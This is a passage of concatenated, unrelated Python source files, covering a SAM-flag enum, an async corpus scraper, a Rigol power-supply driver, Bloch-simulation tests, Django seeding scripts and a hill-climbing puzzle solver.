    # Trailing run out to x_max (or a single position when x_max is unknown).
    cov_segments.append(
        numpy.full(
            1 if x_max is None else x_max + 1 - last_pos,
            current_coverage if current_coverage != 0 else zero,
        )
    )
    return numpy.concatenate(cov_segments)
class SAMFlag(enum.IntFlag):
    """
    Bitwise flags of the SAM FLAG field; combine and test members with
    `|` and `&` (IntFlag semantics).

    From Wikipedia SAM Format entry:
    (int) (binary) (meaning)
    1 000000000001 template having multiple templates in sequencing (read is paired)
    2 000000000010 each segment properly aligned according to the aligner (read mapped in proper pair)
    4 000000000100 segment unmapped (read1 unmapped)
    8 000000001000 next segment in the template unmapped (read2 unmapped)
    16 000000010000 SEQ being reverse complemented (read1 reverse complemented)
    32 000000100000 SEQ of the next segment in the template being reverse complemented (read2 reverse complemented)
    64 000001000000 the first segment in the template (is read1)
    128 000010000000 the last segment in the template (is read2)
    256 000100000000 not primary alignment
    512 001000000000 alignment fails quality checks
    1024 010000000000 PCR or optical duplicate
    2048 100000000000 supplementary alignment (e.g. aligner specific, could be a portion of a split read or a tied region)
    """
    PAIRED = 1
    PROPER_PAIR = 2
    UNMAPPED = 4
    NEXT_UNMAPPED = 8
    REV_COMP = 16
    NEXT_REV_COMP = 32
    READ_1 = 64
    READ_2 = 128
    NON_PRIMARY = 256
    LOW_Q = 512
    DUPLICATE = 1024
    SUPPLEMENTAL = 2048
|
nilq/baby-python
|
python
|
"""
Module for requesting a URL and getting the page's HTML code from there,
downloading media files, and checking that the request is correct and the page exists in the RNC.
"""
__all__ = (
'get_htmls', 'is_request_correct', 'download_docs'
)
import asyncio
import logging
import time
from typing import List, Optional, Tuple, Union
import aiofiles
import aiohttp
import bs4
logger = logging.getLogger("rnc")
# Seconds to back off after an HTTP 429; also used as the aiohttp client
# timeout in get_htmls_coro().
WAIT = 24
class BaseRequestError(Exception):
    """Root of this module's exception hierarchy."""
    pass
class NoResultFound(BaseRequestError):
    """The HTTP request succeeded but the corpus returned no results."""
    pass
class LastPageDoesntExist(BaseRequestError):
    """The requested last page does not exist (RNC redirected to page 1)."""
    pass
class WrongHTTPRequest(BaseRequestError):
    """The HTTP request itself failed or was malformed."""
    pass
async def fetch_html(url: str,  # type: ignore
                     ses: aiohttp.ClientSession,
                     **kwargs) -> Optional[Union[Tuple[int, str], int]]:
    """ Coro, obtaining page's HTML code.

    This coro should be awaited from a worker.

    :return: tuple of int and str, page index and its HTML code.
     None if there's an error, -1 if it's 429 and the worker should
     wait some time and make request again.
    :exception: all exceptions should be processed here.
    """
    worker_name = kwargs.pop('worker_name', '')
    try:
        resp = await ses.get(url, params=kwargs)
    except Exception as e:
        logger.error(
            f"{e}\n{worker_name}Cannot get "
            f"answer from '{url}' with {kwargs}")
        return  # type: ignore
    try:
        if resp.status == 200:
            # 'p' is the page index the caller queued for this request.
            return kwargs['p'], await resp.text('utf-8')
        if resp.status == 429:
            # Too many requests: signal the worker to back off and retry.
            return -1
        logger.error(
            f"{worker_name}{resp.status} -- '{resp.reason}' "
            f"requesting to {resp.url}"
        )
    finally:
        # Fix: always release the connection, even if reading the body or
        # formatting the log message raises (the original leaked it then).
        resp.close()
async def worker_fetching_html(worker_name: str,
                               q_args: asyncio.Queue,
                               q_results: asyncio.Queue) -> None:
    """
    Worker requesting to URL with args from
    q_args and putting results to q_results.

    Wait some time and request again if there's 429 error.
    """
    while True:
        # NOTE(review): get_nowait() raises asyncio.QueueEmpty once the queue
        # drains; the task then ends with that exception and is cancelled by
        # the caller after q_args.join() — confirm this is the intended
        # shutdown path.
        url, ses, kwargs = q_args.get_nowait()
        logger.debug(
            f"{worker_name}Requested to '{url}' with '{kwargs}'")
        res = await fetch_html(url, ses, **kwargs, worker_name=worker_name)
        if res is None:
            # Unrecoverable error for this page: mark it done and stop.
            q_args.task_done()
            return
        while res == -1:
            # HTTP 429 back-off: sleep and retry the same page.
            logger.debug(
                f"{worker_name}429 'Too many requests', "
                f"page: {kwargs['p']}; wait {WAIT}s"
            )
            await asyncio.sleep(WAIT)
            res = await fetch_html(url, ses, **kwargs, worker_name=worker_name)
        logger.debug(
            f"{worker_name}Received from '{url}' with '{kwargs}'")
        q_args.task_done()
        await q_results.put((res[0], res[1]))  # type: ignore
async def get_htmls_coro(url: str,
                         start: int,
                         stop: int,
                         **kwargs) -> List[str]:
    """
    Coro running 5 workers doing requests and
    getting HTML codes of the pages.

    URLs will be created for i in range(start, stop),
    HTTP tag 'p' (page) is i.
    """
    # WAIT doubles as the per-request client timeout (seconds).
    timeout = aiohttp.ClientTimeout(WAIT)
    q_results = asyncio.Queue(maxsize=-1)  # type: ignore
    q_args = asyncio.Queue(maxsize=-1)  # type: ignore
    async with aiohttp.ClientSession(timeout=timeout) as ses:
        # One queued job per page index.
        for p_index in range(start, stop):
            await q_args.put((url, ses, {**kwargs, 'p': p_index}))
        tasks = []
        for worker_index in range(5):
            name = f"Worker-{worker_index + 1}: "
            task = asyncio.create_task(
                worker_fetching_html(name, q_args, q_results)
            )
            tasks += [task]
        # Wait until every queued page is processed, then stop the workers.
        await q_args.join()
        for task in tasks:
            task.cancel()
        results = [
            q_results.get_nowait()
            for _ in range(q_results.qsize())
        ]
        # Workers finish out of order; restore ascending page order.
        results.sort(key=lambda res: res[0])
        return [
            html for _, html in results
        ]
def get_htmls(url: str,
              start: int = 0,
              stop: int = 1,
              **kwargs) -> List[str]:
    """Run the fetching coroutine and return the pages' HTML codes,
    one per page index in range(start, stop)."""
    logger.info(f"Requested to '{url}' [{start};{stop}) with params {kwargs}")
    began = time.time()
    pages = asyncio.run(get_htmls_coro(url, start, stop, **kwargs))
    logger.info("Request was successfully completed")
    logger.info(f"Coro executing time: {round(time.time() - began, 2)}")
    return pages
async def get_htmls_async(url: str,
                          start: int = 0,
                          stop: int = 1,
                          **kwargs) -> List[str]:
    """Async variant of get_htmls(): await the fetching coroutine directly
    and return the pages' HTML codes."""
    logger.info(f"Requested to '{url}' [{start};{stop}) with params {kwargs}")
    began = time.time()
    pages = await get_htmls_coro(url, start, stop, **kwargs)
    logger.info("Request was successfully completed")
    logger.info(f"Coro executing time: {round(time.time() - began, 2)}")
    return pages
def whether_result_found(url: str,
                         **kwargs) -> str:
    """
    Whether the page contains results.

    :return: first page HTML code if everything is OK.
    :exception RuntimeError: if HTTP request was wrong.
    :exception ValueError: if the result not found.
    """
    logger.debug("Validating that the request is OK")
    try:
        first_page = get_htmls(url, **kwargs)[0]
    except Exception:
        logger.error(f"The request is not correct: {kwargs}")
        raise RuntimeError
    logger.debug("The request is correct")
    logger.debug("Validating that the result exits")
    # TODO: narrow the search scope
    markup = bs4.BeautifulSoup(first_page, 'lxml')
    body_text = markup.find('div', {'class': 'content'}).text
    nothing_found = ('По этому запросу ничего не найдено.' in body_text or
                     'No results match the search query.' in body_text)
    if nothing_found:
        raise ValueError
    return first_page
def does_page_exist(url: str,
                    p_index: int,
                    first_page: str,
                    **kwargs) -> str:
    """
    Whether a page at the index exists.

    It means, the number of the page in 'pager' is equal to expected index.
    RNC redirects to the first page if the page at the number doesn't exist.
    Here it's assumed, that the request's correct.

    :return: last page code if everything is OK.
    :exception ValueError: the page doesn't exist.
    """
    # indexing starts with 0
    start = p_index
    # clamp negative indices to 0
    start = start * (start >= 0)
    stop = p_index + 1
    # request's correct → first page exists
    if stop == 1:
        return first_page
    last_page = get_htmls(url, start, stop, **kwargs)[0]
    soup = bs4.BeautifulSoup(last_page, 'lxml')
    pager = soup.find('p', {'class': 'pager'})
    if pager:
        # NOTE(review): max() itself raises ValueError when the pager holds
        # no numeric links; callers treat that the same as "page missing".
        max_page_number = max(
            int(page.text)
            for page in pager.find_all('a')
            if page.text.isdigit()
        )
        if not max_page_number:
            raise ValueError
        if max_page_number < stop:
            raise ValueError
        return last_page
    # if there's no pager, but result exists.
    # this might happen if expand=full or out=kwic
    if last_page == first_page:
        raise ValueError
    return last_page
def is_request_correct(url: str,
                       p_count: int,
                       **kwargs) -> Tuple[str, str]:
    """
    Check:
     – is the HTTP request correct (means there are no exceptions catch).
     – has there been any result.
     – does a page at the number exist (
     means RNC doesn't redirect to the first page).

    :return: first and last pages if everything's OK.
    :exception WrongHTTPRequest: HTTP request is wrong.
    :exception NoResultFound: no result found.
    :exception LastPageDoesntExist: the last page doesn't exist.
    """
    logger.debug("Validating that everything is OK")
    try:
        # to reduce the number of requests
        # the two checks are combined into one.
        # coro writes logs by itself
        first_page = whether_result_found(url, **kwargs)
    except ValueError:
        # Request worked, corpus just has no matches.
        logger.error("HTTP request is OK, but no result found")
        raise NoResultFound(f"{kwargs}")
    except RuntimeError:
        logger.error("HTTP request is wrong")
        raise WrongHTTPRequest(f"{kwargs}")
    logger.debug("HTTP request is correct, result found")
    logger.debug("Validating that the last page exists")
    try:
        # p_count pages requested → last index is p_count - 1.
        last_page = does_page_exist(url, p_count - 1, first_page, **kwargs)
    except ValueError:
        logger.error("Everything is OK, but last page doesn't exist")
        raise LastPageDoesntExist(f"{kwargs}")
    logger.debug("The last page exists")
    logger.debug("Validated successfully")
    return first_page, last_page
async def whether_result_found_async(url: str,
                                     **kwargs) -> str:
    """
    Whether the page contains results.

    :param url: URL to request.
    :param kwargs: query params for the request.
    :return: first page HTML code if everything is OK.
    :exception RuntimeError: if HTTP request was wrong.
    :exception ValueError: if the result not found.
    """
    logger.debug("Validating that the request is OK")
    try:
        page_html = (await get_htmls_async(url, **kwargs))[0]
    except Exception:
        # any failure of the HTTP helper is reported uniformly as
        # RuntimeError so callers only have to handle one error type
        logger.error(f"The request is not correct: {kwargs}")
        raise RuntimeError
    logger.debug("The request is correct")

    logger.debug("Validating that the result exits")
    soup = bs4.BeautifulSoup(page_html, 'lxml')
    # TODO: narrow the search scope
    content = soup.find('div', {'class': 'content'}).text
    # RNC shows the "nothing found" message in Russian or in English,
    # depending on the interface language
    res_msg = ('По этому запросу ничего не найдено.' in content or
               'No results match the search query.' in content)
    if res_msg:
        raise ValueError
    return page_html
async def does_page_exist_async(url: str,
                                p_index: int,
                                first_page: str,
                                **kwargs) -> str:
    """
    Check whether a page at the given index exists.

    The number shown in the 'pager' must reach the expected index;
    RNC redirects to the first page when the page does not exist.
    The request itself is assumed here to be correct.

    :return: last page code if everything is OK.
    :exception ValueError: the page doesn't exist.
    """
    # page indexing starts with 0; negative indices collapse to 0
    first_index = max(p_index, 0)
    last_index = p_index + 1
    # the request is known to be correct, so the first page exists
    if last_index == 1:
        return first_page

    html = (await get_htmls_async(url, first_index, last_index, **kwargs))[0]
    soup = bs4.BeautifulSoup(html, 'lxml')
    pager = soup.find('p', {'class': 'pager'})
    if not pager:
        # no pager although a result exists; this might happen with
        # expand=full or out=kwic — an answer identical to the first
        # page means RNC redirected us back, i.e. the page is missing
        if html == first_page:
            raise ValueError
        return html

    # max() itself raises ValueError when the pager holds no numbers,
    # which is exactly the "page doesn't exist" signal the caller expects
    greatest = max(int(anchor.text)
                   for anchor in pager.find_all('a')
                   if anchor.text.isdigit())
    if not greatest or greatest < last_index:
        raise ValueError
    return html
async def is_request_correct_async(url: str,
                                   p_count: int,
                                   **kwargs) -> Tuple[str, str]:
    """
    Validate the whole request in one pass:
    – is the HTTP request correct (means there are no exceptions catch).
    – has there been any result.
    – does a page at the number exist (
    means RNC doesn't redirect to the first page).

    :param url: base URL to request.
    :param p_count: expected number of result pages.
    :param kwargs: query params, forwarded to the HTTP helpers.
    :return: first and last pages if everything's OK.
    :exception WrongHTTPRequest: HTTP request is wrong.
    :exception NoResultFound: no result found.
    :exception LastPageDoesntExist: the last page doesn't exist.
    """
    logger.debug("Validating that everything is OK")
    try:
        # to reduce the number of requests
        # the two checks are combined into one.
        # coro writes logs by itself
        first_page = await whether_result_found_async(url, **kwargs)
    except ValueError:
        # whether_result_found_async signals "no result" with ValueError
        logger.error("HTTP request is OK, but no result found")
        raise NoResultFound(f"{kwargs}")
    except RuntimeError:
        # ...and "request failed" with RuntimeError
        logger.error("HTTP request is wrong")
        raise WrongHTTPRequest(f"{kwargs}")
    logger.debug("HTTP request is correct, result found")

    logger.debug("Validating that the last page exists")
    try:
        # pages are 0-indexed, hence p_count - 1 is the last one
        last_page = await does_page_exist_async(
            url, p_count - 1, first_page, **kwargs)
    except ValueError:
        logger.error("Everything is OK, but last page doesn't exist")
        raise LastPageDoesntExist(f"{kwargs}")
    logger.debug("The last page exists")
    logger.debug("Validated successfully")
    return first_page, last_page
async def fetch_media_file(url: str,  # type: ignore
                           ses: aiohttp.ClientSession,
                           **kwargs) -> Optional[Union[bytes, int]]:
    """
    Coro, getting media content to write.

    :param url: media file URL.
    :param ses: aiohttp session to request with.
    :param kwargs: request params; ``worker_name`` is popped and used
     only in log messages.
    :return: bytes (media) if everything is OK,
     -1 if there's 429 error, None if it is another error.
    :exception: all exceptions should be processed here.
    """
    worker_name = kwargs.pop('worker_name', '')
    try:
        resp = await ses.get(url, allow_redirects=True, params=kwargs)
    except Exception as e:
        logger.error(
            f"{e}\n{worker_name}Cannot get "
            f"answer from '{url}' with {kwargs}")
        # implicit None tells the caller to give this file up
        return  # type: ignore

    if resp.status == 200:
        content = await resp.read()
        resp.close()
        return content
    elif resp.status == 429:
        # rate limited: -1 asks the caller to wait and retry
        resp.close()
        return -1
    # any other status: log it and fall through to an implicit None
    logger.error(
        f"{resp.status}: {resp.reason} requesting to {resp.url}"
    )
    resp.close()
async def dump(content: bytes,
               filename: str) -> None:
    """Asynchronously write *content* to the media file *filename*."""
    async with aiofiles.open(filename, 'wb') as out_file:
        await out_file.write(content)
async def worker_fetching_media(worker_name: str,
                                q_args: asyncio.Queue) -> None:
    """
    Worker getting media file and dumping it to file.

    Takes ``(url, session, filename)`` triples from *q_args*; on a 429
    answer it waits WAIT seconds and requests again, on any other error
    it abandons the item and stops.
    """
    while True:
        # get_nowait raises asyncio.QueueEmpty once the queue is drained,
        # ending this task; the spawner cancels the workers after join()
        url, ses, filename = q_args.get_nowait()

        logger.debug(f"{worker_name}Requested to '{url}'")
        content = await fetch_media_file(url, ses, worker_name=worker_name)
        if content is None:
            # unrecoverable error for this url — give up on it
            q_args.task_done()
            return
        while content == -1:
            # rate limited: back off, then retry the same url
            logger.debug(
                f"{worker_name}: 429 'Too many requests', "
                f"url: {url}; wait {WAIT}s"
            )
            await asyncio.sleep(WAIT)
            content = await fetch_media_file(url, ses, worker_name=worker_name)
        logger.debug(f"{worker_name}Received from '{url}'")

        # BUG FIX: these two log messages contained the literal text
        # '(unknown)' instead of the target filename being written
        logger.debug(f"{worker_name}Dumping '{url}' to '{filename}'")
        await dump(content, filename)  # type: ignore
        logger.debug(f"{worker_name}'{filename}' dumped")

        q_args.task_done()
async def download_docs_coro(url_to_name: List[Tuple[str, str]]) -> None:
    """ Coro running 5 workers to download media files. """
    timeout = aiohttp.ClientTimeout(WAIT)
    queue = asyncio.Queue(maxsize=-1)  # type: ignore

    async with aiohttp.ClientSession(timeout=timeout) as session:
        # enqueue every (url, session, filename) job up front
        for url, filename in url_to_name:
            await queue.put((url, session, filename))

        workers = [
            asyncio.create_task(
                worker_fetching_media(f"Worker-{number + 1}: ", queue))
            for number in range(5)
        ]

        # wait until every queued job is marked done, then stop workers
        await queue.join()
        for worker in workers:
            worker.cancel()
def download_docs(url_to_name: List[Tuple[str, str]]) -> None:
    """
    Run coro, download the files.

    :param url_to_name: list of tuples of str, pairs: url – filename.
    """
    logger.info(f"Requested {len(url_to_name)} files to download")
    started_at = time.time()
    asyncio.run(download_docs_coro(url_to_name))
    elapsed = round(time.time() - started_at, 2)
    logger.info(f"Downloading completed, coro executing time: {elapsed}s")
async def download_docs_async(url_to_name: List[Tuple[str, str]]) -> None:
    """
    Run coro, download the files.

    :param url_to_name: list of tuples of str, pairs: url – filename.
    """
    logger.info(f"Requested {len(url_to_name)} files to download")
    started_at = time.time()
    await download_docs_coro(url_to_name)
    elapsed = round(time.time() - started_at, 2)
    logger.info(f"Downloading completed, coro executing time: {elapsed}s")
|
nilq/baby-python
|
python
|
"""
Python Interchangeable Virtual Instrument Library
Copyright (c) 2013-2014 Alex Forencich
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
from .. import ivi
from .. import dcpwr
from .. import scpi
# Tracking modes supported by these supplies
TrackingType = set(['floating'])
# Map IVI trigger source names to their SCPI mnemonics
TriggerSourceMapping = {
    'immediate': 'imm',
    'bus': 'bus'}
class rigolBaseDCPwr(scpi.dcpwr.Base, scpi.dcpwr.Trigger, scpi.dcpwr.SoftwareTrigger,
                     scpi.dcpwr.Measurement):
    "Rigol generic IVI DC power supply driver"

    def __init__(self, *args, **kwargs):
        self.__dict__.setdefault('_instrument_id', '')

        super(rigolBaseDCPwr, self).__init__(*args, **kwargs)

        self._output_count = 3

        # Per-channel limits: range name -> (max voltage, max current),
        # plus over-voltage / over-current protection ceilings.
        # Channel 3 is a negative rail, hence the negative maxima.
        self._output_spec = [
            {
                'range': {
                    'P8V': (8.0, 5.0)
                },
                'ovp_max': 8.8,
                'ocp_max': 5.5,
                'voltage_max': 8.0,
                'current_max': 5.0
            },
            {
                'range': {
                    'P30V': (30.0, 2.0)
                },
                'ovp_max': 33.0,
                'ocp_max': 2.2,
                'voltage_max': 30.0,
                'current_max': 2.0
            },
            {
                'range': {
                    'N30V': (-30.0, 2.0)
                },
                'ovp_max': -33.0,
                'ocp_max': 2.2,
                'voltage_max': -30.0,
                'current_max': 2.0
            }
        ]

        # number of *SAV/*RCL state slots on the instrument
        self._memory_size = 10

        self._identity_description = "Rigol generic IVI DC power supply driver"
        self._identity_identifier = ""
        self._identity_revision = ""
        self._identity_vendor = ""
        self._identity_instrument_manufacturer = "Rigol Technologies"
        self._identity_instrument_model = ""
        self._identity_instrument_firmware_revision = ""
        self._identity_specification_major_version = 3
        self._identity_specification_minor_version = 0
        self._identity_supported_instrument_models = ['DP831A', 'DP832', 'DP832A']

        self._add_method('memory.save',
                         self._memory_save)
        self._add_method('memory.recall',
                         self._memory_recall)

        self._init_outputs()

    def _get_bool_str(self, value):
        """
        redefining to change behavior from '0'/'1' to 'off'/'on'
        """
        if bool(value):
            return 'on'
        return 'off'

    def _memory_save(self, index):
        """Save the instrument state into memory slot *index* (1-based)."""
        index = int(index)
        if index < 1 or index > self._memory_size:
            # BUG FIX: OutOfRangeException lives in the ivi module; the
            # bare name would have raised NameError instead
            raise ivi.OutOfRangeException()
        if not self._driver_operation_simulate:
            self._write("*sav %d" % index)

    def _memory_recall(self, index):
        """Recall the instrument state from memory slot *index* (1-based)."""
        index = int(index)
        if index < 1 or index > self._memory_size:
            # BUG FIX: same bare-name problem as in _memory_save
            raise ivi.OutOfRangeException()
        if not self._driver_operation_simulate:
            self._write("*rcl %d" % index)

    def _utility_self_test(self):
        """Run the instrument self test; return (code, message),
        code 0 on pass and -1 when the answer contains 'FAIL'."""
        code = 0
        message = "No Response"
        if not self._driver_operation_simulate:
            self._write("*TST?")
            # wait for test to complete
            message = self._read()
            if 'FAIL' in message:
                code = -1
        return (code, message)
|
nilq/baby-python
|
python
|
from maskcnn import training_aux_wrapper
from sys import argv
def main():
    """CLI entry point: forward the six positional arguments to the trainer."""
    args = argv[1:]
    dataset, image_subset, neuron_subset, seed, arch_name, opt_name = args
    training_aux_wrapper.train_one_wrapper(
        dataset, image_subset, neuron_subset, int(seed), arch_name, opt_name)


if __name__ == '__main__':
    main()
|
nilq/baby-python
|
python
|
import numpy
import unittest
import sycomore
from sycomore.units import *
class TestBloch(unittest.TestCase):
    """Regression tests for the single-step sycomore.bloch operators."""

    def test_pulse(self):
        operator = sycomore.bloch.pulse(47*deg, 23*deg)
        expected = [
            [ 0.95145043,  0.11437562,  0.28576266, 0.        ],
            [ 0.11437562,  0.73054793, -0.67321463, 0.        ],
            [-0.28576266,  0.67321463,  0.68199836, 0.        ],
            [ 0.        ,  0.        ,  0.        , 1.        ]]
        numpy.testing.assert_almost_equal(operator, expected)

    def test_time_interval(self):
        species = sycomore.Species(1000*ms, 100*ms, delta_omega=420*Hz)
        operator = sycomore.bloch.time_interval(species, 10*ms)
        expected = [
            [ 0.27961014, -0.86055152, 0.        , 0.        ],
            [ 0.86055152,  0.27961014, 0.        , 0.        ],
            [ 0.        ,  0.        , 0.99004983, 0.00995017],
            [ 0.        ,  0.        , 0.        , 1.        ]]
        numpy.testing.assert_almost_equal(operator, expected)

    def test_relaxation(self):
        operator = sycomore.bloch.relaxation(
            sycomore.Species(1000*ms, 100*ms), 10*ms)
        expected = [
            [0.90483742, 0.        , 0.        , 0.        ],
            [0.        , 0.90483742, 0.        , 0.        ],
            [0.        , 0.        , 0.99004983, 0.00995017],
            [0.        , 0.        , 0.        , 1.        ]]
        numpy.testing.assert_almost_equal(operator, expected)

    def test_phase_accumulation(self):
        operator = sycomore.bloch.phase_accumulation(numpy.pi/6*rad)
        expected = [
            [ 0.8660254, -0.5      , 0.        , 0.        ],
            [ 0.5      ,  0.8660254, 0.        , 0.        ],
            [ 0.       ,  0.       , 1.        , 0.        ],
            [ 0.       ,  0.       , 0.        , 1.        ]]
        numpy.testing.assert_almost_equal(operator, expected)


if __name__ == "__main__":
    unittest.main()
|
nilq/baby-python
|
python
|
from django.urls import include, path
from rest_framework.routers import DefaultRouter
from project.tweets.views import TweetsViewset
# The router generates the standard list/detail routes for the viewset
router = DefaultRouter()
router.register(r"tweets", TweetsViewset, basename="tweets")

# Mount all router-generated routes at the URL root of this app
urlpatterns = [
    path("", include(router.urls)),
]
|
nilq/baby-python
|
python
|
import random
import names
import csv
from django.template.defaultfilters import slugify
from orcamentos.crm.models import Customer, Person, PhonePerson
from orcamentos.utils.lists import COMPANY_LIST
from orcamentos.utils.gen_random_values import (
gen_cpf,
gen_digits,
gen_phone,
gen_rg,
)
from orcamentos.utils.gen_names import (
gen_female_first_name,
gen_male_first_name,
)
# Seed data loaded from CSV fixtures
customer_list = []
address_list = []

''' Lendo os dados de clientes_.csv '''
# Read the seed customers from clientes_.csv as a list of dicts
with open('fix/clientes_.csv', 'r') as f:
    r = csv.DictReader(f)
    for dct in r:
        customer_list.append(dct)
# redundant: the with-block already closed the file
f.close()

''' Lendo os dados de enderecos_.csv '''
# Read the seed addresses from enderecos_.csv as a list of dicts
with open('fix/enderecos_.csv', 'r') as f:
    r = csv.DictReader(f)
    for dct in r:
        address_list.append(dct)
# redundant: the with-block already closed the file
f.close()

# Create every CSV customer plus 8 extra randomly generated ones
REPEAT = len(customer_list) + 8
photo = 'http://icons.iconarchive.com/icons/icons-land/vista-people/256/Office-Customer-Male-Light-icon.png'

for i in range(REPEAT):
    g = random.choice(['M', 'F'])
    if g == 'M':
        # NOTE(review): two separate calls — treatment and first_name may
        # come from different random draws; presumably intended to match.
        treatment = gen_male_first_name()['treatment']
        first_name = gen_male_first_name()['first_name']
    else:
        treatment = gen_female_first_name()['treatment']
        first_name = gen_female_first_name()['first_name']
    last_name = names.get_last_name()
    if i < 17:
        # first 17 rows come straight from the CSV fixture
        gender = 'M'
        treatment = None
        first_name = customer_list[i]['first_name']
        last_name = None
        company = None
        customer_type = customer_list[i]['customer_type']
        email = None
    else:
        # remaining rows are fully random "physical person" customers
        # NOTE(review): `gender` is assigned here but Customer below is
        # built with `gender=g` — confirm which one is intended.
        gender = g
        company = random.choice(COMPANY_LIST)
        customer_type = 'p'
        email = first_name[0].lower() + '.' + \
            last_name.lower() + '@example.com'
    if customer_type == 'p':
        # physical person: CPF/RG filled, company ids empty
        cpf = gen_cpf()
        rg = gen_rg()
        cnpj = None
        ie = None
    else:
        # legal entity: CNPJ filled, IE exempt
        cpf = None
        rg = None
        cnpj = gen_digits(14)
        ie = 'isento'
    slug = slugify('{} {}'.format(first_name, last_name))
    obj = Customer(
        person_type='c',
        gender=g,
        treatment=treatment,
        first_name=first_name,
        last_name=last_name,
        slug=slug,
        photo=photo,
        company=company,
        email=email,
        customer_type=customer_type,
        cpf=cpf,
        rg=rg,
        cnpj=cnpj,
        ie=ie,
        address=address_list[i]['address'],
        district=address_list[i]['district'],
        city=address_list[i]['city'],
        uf=address_list[i]['uf'],
        cep=address_list[i]['cep'],
    )
    obj.save()
# done

'''
Para cada Person incluimos dois telefones:
um principal e um celular
'''
# For every person, create two phones: a primary one and a cell phone
customers = Customer.objects.all()
aux = []
for person in customers:
    obj_pri = PhonePerson(
        phone=gen_phone(),
        person=person,
    )
    obj = PhonePerson(
        phone=gen_phone(),
        person=person,
        phone_type='cel'
    )
    aux.append(obj_pri)
    aux.append(obj)
# single bulk insert instead of one query per phone
PhonePerson.objects.bulk_create(aux)
|
nilq/baby-python
|
python
|
from urllib.request import urlopen
def get_page_3(url):
    """Download *url* and return its HTML decoded as UTF-8 text."""
    response = urlopen(url)
    html = response.read().decode('utf')
    response.close()
    return html
def get_next_target(website):
    """Return the first double-quoted ``<a href`` URL in *website*,
    or -1 when no anchor tag is present."""
    anchor = website.find('<a href')
    if anchor == -1:
        return anchor
    open_quote = website.find('"', anchor)
    close_quote = website.find('"', open_quote + 1)
    return website[open_quote + 1:close_quote]
page = get_page_3('http://xkcd.com/353')
# BUG FIX: the original loop never advanced `page`, so it printed the
# same first link (and the whole page) forever.  Advance past each
# found link so every link is printed exactly once.
remaining = page
url = get_next_target(remaining)
while url != -1:
    print(url)
    remaining = remaining[remaining.find(url) + len(url):]
    url = get_next_target(remaining)
print(page)
|
nilq/baby-python
|
python
|
/home/runner/.cache/pip/pool/cf/51/25/b749cb02a5396340ce9fda7fffc4272d66af9443a947242291d6202aba
|
nilq/baby-python
|
python
|
def proc():
    """Read one word from stdin and append it (tagged /NNP) to the
    person dictionary, unless it already occurs in some line."""
    # BUG FIX: the original shadowed the builtin `str` and leaked the
    # file handle when it returned early from inside the read loop;
    # `with` guarantees the handle is closed on every path.
    word = input()
    with open('./dict/person.dic', mode='rt', encoding='utf-8') as fp:
        for line in fp:
            if word in line:
                # already present — nothing to add
                return
    with open('./dict/person.dic', mode='at', encoding='utf-8') as fp:
        fp.write('\n%s/NNP' % word)
    print('Added!')
# Keep prompting for words until interrupted (Ctrl-C) or stdin is
# exhausted (input() then raises EOFError and the loop terminates).
while True:
    proc()
|
nilq/baby-python
|
python
|
import numpy as np
import libs.state_node as STTREE
class HillClimbing:
    """Hill-climbing solver for the sliding-tile puzzle, using the
    Manhattan distance heuristic and allowing up to *k* lateral moves
    (moves to a state with an equal heuristic value)."""

    def __init__(self, initialPuzzle, answerPuzzle, k):
        """
        :param initialPuzzle: start state; must expose ``.puzzle`` (a 2-D
         numpy array of piece numbers) and ``.n`` (board size)
        :param answerPuzzle: goal state; must expose ``.puzzle``
        :param k: maximum number of consecutive lateral moves allowed
        """
        self.totalExpansions = 0          # number of node expansions performed
        self.k = k                        # lateral-move budget (reset on improvement)
        self.answerPuzzle = answerPuzzle.puzzle
        # frontier entries are (node, heuristic value, path cost) triples
        self.frontier = []
        self.frontier.append(
            (
                STTREE.StateNode(initialPuzzle.puzzle, initialPuzzle.n),
                self.manhattanDistance(initialPuzzle.puzzle),
                0,
            )
        )
        self.path = []                    # sequence of visited board states

    def manhattanDistance(self, actualPuzzle):
        """Sum of each piece's distance to its goal position (the blank,
        assumed to belong in the bottom-right cell, is skipped)."""
        # Calculates the Manhattan Distance: sum of the distances of each piece to it's correct position
        totalDist = 0
        actualPiece = 1
        for x in range(len(actualPuzzle)):
            for y in range(len(actualPuzzle[x])):
                if not (x == len(actualPuzzle) - 1 and y == len(actualPuzzle[x]) - 1):
                    actualCoord = np.where(actualPuzzle == actualPiece)
                    coordX, coordY = actualCoord[0][0], actualCoord[1][0]
                    totalDist += abs(x - coordX) + abs(y - coordY)
                    actualPiece += 1
        return totalDist

    def checkNodeSolution(self, nodePuzzle):
        """True when *nodePuzzle* equals the goal board."""
        return np.array_equal(nodePuzzle, self.answerPuzzle)

    def insertNodeToFrontier(self, node, actualCost):
        """Append *node* (if the move exists) with its heuristic value
        and incremented path cost."""
        # If the node action exists
        if node:
            self.frontier.append(
                (node, self.manhattanDistance(node.puzzle), actualCost + 1)
            )

    def sortFrontier(self):
        """Order the frontier by ascending heuristic value."""
        self.frontier = sorted(self.frontier, key=lambda x: x[1])

    def execute(self):
        """Run the climb.

        :return: (final node, number of expansions, final path cost);
         the final node is the goal if one was reached, otherwise the
         local optimum where the search stopped.
        """
        # Initializing the actual distance with the greater possible value
        actualDistance = float("inf")
        k = self.k
        while len(self.frontier) > 0:
            self.sortFrontier()
            newNode, newDistance, newCost = self.frontier.pop(0)
            # If the avaliation function (Manhattan Distance) of the new node is smaller than the old actual node, reset the k for lateral movements
            if newDistance < actualDistance:
                k = self.k
                actualNode, actualDistance, actualCost = newNode, newDistance, newCost
                self.path.append(actualNode.puzzle)
            elif newDistance == actualDistance:
                # If the remaining lateral movements is greater than 0, move laterally and decrease k by 1
                if k > 0:
                    k -= 1
                    actualNode, actualDistance, actualCost = (
                        newNode,
                        newDistance,
